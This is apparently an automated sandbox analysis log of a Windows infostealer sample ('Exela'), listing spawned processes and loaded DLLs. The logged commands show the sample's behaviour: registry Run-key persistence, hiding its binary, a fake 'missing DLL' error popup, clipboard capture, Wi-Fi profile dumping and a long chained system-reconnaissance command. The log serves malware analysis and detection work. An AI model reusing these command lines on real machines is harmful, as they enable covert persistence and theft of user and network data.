            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()""Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "cmd.exe /c chcp"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe Get-Clipboard"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"Jump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuidJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: unknown unknownJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeProcess created: unknown unknownJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get nameJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklistJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path Win32_ComputerSystem get ManufacturerJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Exela Update Service" /t REG_SZ /d "C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe" /f
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('The Program can\x22t start because api-ms-win-crt-runtime-|l1-1-.dll is missing from your computer. Try reinstalling the program to fix this problem', 0, 'System Error', 0+16);close()"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Get-Clipboard
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\HOSTNAME.EXE hostname
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic logicaldisk get caption,description,providername
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\query.exe query user
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net localgroup administrators
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user guest
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net user administrator
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic startup get caption,command
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /svc
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ROUTE.EXE route print
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\NETSTAT.EXE netstat -ano
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc query type= service state= all
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show state
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh firewall show config
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profiles
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user
            Source: C:\Windows\System32\query.exeProcess created: C:\Windows\System32\quser.exe "C:\Windows\system32\quser.exe"
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 localgroup administrators
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user guest
            Source: C:\Windows\System32\net.exeProcess created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 user administrator
            Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: libffi-8.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: sqlite3.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: libcrypto-1_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: libssl-1_1.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: sbiedll.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
            Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
            Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mshtml.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: iertutil.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: powrprof.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: umpdc.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: urlmon.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msiso.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: srpapi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msimtf.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxgi.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textinputframework.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: ntmarta.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: wintypes.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dataexchange.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d11.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dcomp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: jscript9.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: scrrun.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: version.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: sxs.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: textshaping.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msls31.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d2d1.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dwrite.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: d3d10warp.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: dxcore.dll
            Source: C:\Windows\System32\mshta.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
            Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
            Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: onex.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dll
            Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dll
